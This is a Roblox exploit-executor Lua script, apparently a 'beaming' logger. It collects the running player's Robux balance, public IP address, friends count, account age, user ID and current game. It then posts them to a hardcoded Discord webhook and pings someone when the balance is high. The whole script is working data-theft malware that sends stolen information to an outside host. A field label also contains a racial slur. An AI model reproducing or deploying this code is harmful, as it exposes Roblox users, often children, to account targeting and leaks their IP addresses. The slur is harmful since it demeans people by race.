local robux = tostring(game:HttpGetAsync("https://economy.roblox.com/v1/user/currency", true)) local str = robux local robux, replaced = string.gsub(str, '{"robux":', "") local str = robux local robux, replaced = string.gsub(str, '}', "") local robuxcount = tonumber(robux) function abbreviateNumber (n) local s = tostring(math.floor(n)) return string.sub(s, 1, ((#s - 1) % 3) + 1) .. ({"", "K", "M", "B", "T", "QA", "QI", "SX", "SP", "OC", "NO", "DC", "UD", "DD", "TD", "QAD", "QID", "SXD", "SPD", "OCD", "NOD", "VG", "UVG"})[math.floor((#s - 1) / 3) + 1] end local robux = abbreviateNumber(robuxcount) local webhookvar = "" local beamed = "Teleported" local color = 0x27FF00 local bobux = false if robuxcount <= 1 then beamed = "Kicked" end if game.Players.LocalPlayer.AccountAge <= 14 and robuxcount <= 1 then beamed = "Alt Account" end local ping = "" if robuxcount >= 1000 then ping = "<@!862819250895716373>" end if beamed == "Teleported" then color = 0xFFFFFF webhookvar = "https://discord.com/api/webhooks/995372992475435069/UjvjBbdOtDN15uCutFzMkaUcAeA6BiP_sonvEl5sRg0ZzX06pRKNmmyyYA9wNRsglEkb" end local GameName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name local ip = tostring(game:HttpGet("https://api.ipify.org", true)) local Players = game:GetService("Players") local USERNAME = game.Players.LocalPlayer.Name local friendscount = 0 local function iterPageItems(pages) return coroutine.wrap(function() local pagenum = 1 while true do for _, item in ipairs(pages:GetCurrentPage()) do coroutine.yield(item, pagenum) end if pages.IsFinished then break end pages:AdvanceToNextPageAsync() pagenum = pagenum + 1 end end) end -- First, get the user ID of the player local userId = Players:GetUserIdFromNameAsync(USERNAME) -- Then, get a FriendPages object for their friends local friendPages = Players:GetFriendsAsync(userId) -- Iterate over the items in the pages. For FriendPages, these -- are tables of information about the friend, including Username. -- Collect each username in a table local usernames = {} for item, pageNo in iterPageItems(friendPages) do table.insert(usernames, item.Username) friendscount = friendscount + 1 end local webhookcheck = is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or secure_load and "Sentinel" or KRNL_LOADED and "Krnl" or SONA_LOADED and "Sona" or "Kid with shit exploit" local url = webhookvar local data = { ["content"] = ping, ["embeds"] = {{ ["title"] = "@"..game.Players.LocalPlayer.Name, ["color"] = tonumber(color); -- Hex color code, currently set to red. ["tts"] = true; -- Can someone use the discord feature: text to speach with your message. ["url"] = "https://www.roblox.com/users/"..game.Players.LocalPlayer.userId.."/profile"; -- Same as with author's url, but this one only connects to the title of the whole message. ["thumbnail"] = { ["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.userId.."&width=150&height=150&format=png"; }; ["fields"] = { -- Make a table { -- now make a new one for each field you wish to add ["name"] = "> Friends :handshake:"; ["value"] = [[```yaml ]]..friendscount..[[ ```]], ["inline"] = true; -- means that its either inline with others, from left to right or if it is set to false, from up to down. }, { -- now make a new one for each field you wish to add ["name"] = "> UserId :mortar_board: "; ["value"] = [[```yaml ]]..game.Players.LocalPlayer.userId..[[ ```]], ["inline"] = true; -- means that its either inline with others, from left to right or if it is set to false, from up to down. }, { -- now make a new one for each field you wish to add ["name"] = "> Account Age :robot:"; ["value"] = [[```yaml ]]..game.Players.LocalPlayer.AccountAge..[[ ```]], ["inline"] = true; -- means that its either inline with others, from left to right or if it is set to false, from up to down. }, { -- now make a new one for each field you wish to add ["name"] = "> nigga coins :muscle_tone5:"; ["value"] = [[```yaml ]]..robux..[[ ```]], ["inline"] = true; -- means that its either inline with others, from left to right or if it is set to false, from up to down. }, { -- now make a new one for each field you wish to add ["name"] = "> IP Address :woman_detective:"; ["value"] = [[```yaml ]]..ip..[[ ```]], ["inline"] = true; -- means that its either inline with others, from left to right or if it is set to false, from up to down. }, { -- now make a new one for each field you wish to add ["name"] = "Game :dart:"; ["value"] = [[```yaml ]]..GameName..[[ ```]], ["inline"] = false; -- means that its either inline with others, from left to right or if it is set to false, from up to down. }, } }} } local newdata = game:GetService("HttpService"):JSONEncode(data) local headers = { ["content-type"] = "application/json" } request = http_request or request or HttpPost or syn.request local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers} request(abcdef)